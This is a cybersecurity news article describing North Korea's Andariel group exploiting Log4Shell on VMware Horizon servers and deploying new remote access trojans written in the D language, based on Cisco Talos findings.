Lazarus Group Is Still Juicing Log4Shell, Using RATs Written in 'D'

The infamous vulnerability may be on the older side at this point, but North Korea's primo APT Lazarus is creating new, unique malware around it at a remarkable clip.

4 Min Read
North Korean flag on a keyboard key
Source: David Carillet via Shutterstock

North Korean hackers are still exploiting Log4Shell around the world. And lately, they're using that access to attack organizations with one of three new remote access Trojans (RATs) written in the rarely seen "D" (aka dlang) programming language.

The group behind this scheme — "Andariel" (aka Onyx Sleet, Plutonium) — is one of many entities within Lazarus, the umbrella cybercrime collective. Andariel specializes in obtaining initial access and persistence for longer-term espionage campaigns in service of the Kim Jung Un regime. In some cases, though, it has carried out its own ransomware attacks against healthcare organizations.

Since March, Cisco Talos has observed three Andariel attacks of note using Log4Shell: against an agriculture organization in South America, a European manufacturing company, and an American subsidiary of a Korean physical security company.

In each of these cases, the group has deployed novel malware written in an unpopular C++ offshoot programming language known as "D," with the intent to throw off detection and analysis. As Cisco Talos head of outreach Nick Biasini emphasizes, this is what makes North Korea's hackers most unique.

"For a long time tooling has been collapsing — everybody kind of uses the same tool sets to obscure attribution," he says. "Lazarus has gone the exact opposite direction. They go crazy with writing bespoke malware."

Log4Shell: An Initial-Access Gift That Keeps Giving

Andariel's recent attacks began by exploiting exposed VMware Horizon servers carrying Log4Shell, the now 2-year-old historic vulnerability in Apache Log4j.

The flaw (CVE-2021-44228) is a max-severity vulnerability that rates 10 out of 10 on the CVSS bug-severity scale. Due to the ubiquity of the Log4J Java library that it impacted, researchers estimated that affected systems were in the hundreds of millions when it was first discovered.

Two years on and multiple “the sky is falling” headlines later, Veracode reported last week that more than a third (38%) of all in-use applications are still using vulnerable versions of Log4j.

"It's possible that organizations have software that they don't even realize was affected by Log4j — it was so widely used that the cascading impacts are still really being felt today," Biasini says with some sympathy, and a caveat. "That being said, patching is still something that organizations struggle with."

Andariel's Latest Cyberattacks

In the three recent campaigns that the researchers highlighted, Log4Shell was used to achieve initial access. After the intrusion, to establish persistence, the attackers dropped "HazyLoad," a custom proxy tool. Next, they created new users with administrative privileges on the host machine, which they used to download credential harvesting software like Mimikatz and, ultimately, their custom malware tools.

Andariel's current arsenal includes "NineRAT," a dropper-cum-backdoor that uses Telegram as its command-and-control (C2) base; "DLRAT," used for downloading additional malware and executing commands on infected hosts; and a downloader called "BottomLoader."

Though outwardly unexceptional, these new tools do stand out for being written in D, a 22-year-old offshoot of C++.

The Exceptional Range of DPRK Hackers

Some hackers achieve stealth with living-off-the-land (LotL) techniques. Some use code obfuscation, steganography, and more elaborate tricks. In contrast, North Korean hackers — more so than anyone else, it seems — resist detection and analysis by building custom malware in bulk, using old, unloved programming languages their adversaries aren't expecting.

"A lot of malware detection is either written for specific malware variants, or written in ways that detect more general characteristics of malware," Biasini explains. Novel malware — which the DPRK creates plenty of — serves to defeat antivirus scans looking for specific signatures, and oddball languages like D add a layer of difficulty for programs trained on more common ones.

Lazarus proved as much with "QuiteRAT," its recently discovered tool built with Qt, a program designed for building graphical user interfaces. "By using these weird programming languages, they can potentially evade some of those detections. Maybe the endpoint detection won't flag that weird RAT that's written in dlang, but if they pulled a RAT that was written in C or C++, it'd get flagged immediately," Biasini says.

It's for this reason that Lazarus attacks demand just a bit of extra vigilance.

"It's going to take you a while to get your feet underneath you and understand how this works," Biasini cautions, "because logically it's all the same, but it just does it in a different format."

About the Author

Nate Nelson, Contributing Writer

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" -- an award-winning Top 20 tech podcast on Apple and Spotify -- and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.

Keep up with the latest cybersecurity threats, newly discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

You May Also Like


More Insights